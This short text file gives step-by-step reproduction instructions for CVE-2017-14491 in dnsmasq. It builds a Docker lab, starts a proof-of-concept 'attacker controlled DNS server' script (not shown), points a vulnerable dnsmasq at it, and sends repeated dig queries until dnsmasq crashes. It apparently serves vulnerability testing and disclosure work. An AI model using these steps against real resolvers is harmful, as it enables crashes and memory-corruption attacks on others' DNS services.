CVE-2017-14491-instructions.txt

1) Build the docker and open three terminals

docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
docker exec -it <container_id> bash

2) On one terminal let’s launch attacker controlled DNS server:

# python poc.py  127.0.0.2 53
Listening at 127.0.0.2:53

3) On another terminal let’s launch dnsmasq forwarding queries to attacker controlled DNS:

# /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S 127.0.0.2 --no-hosts --no-resolv
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq: using nameserver 127.0.0.2#53
dnsmasq: cleared cache

4) Let’s fake a client making a request twice (or more) so we hit the dnsmasq cache:

# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null

5)  The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash.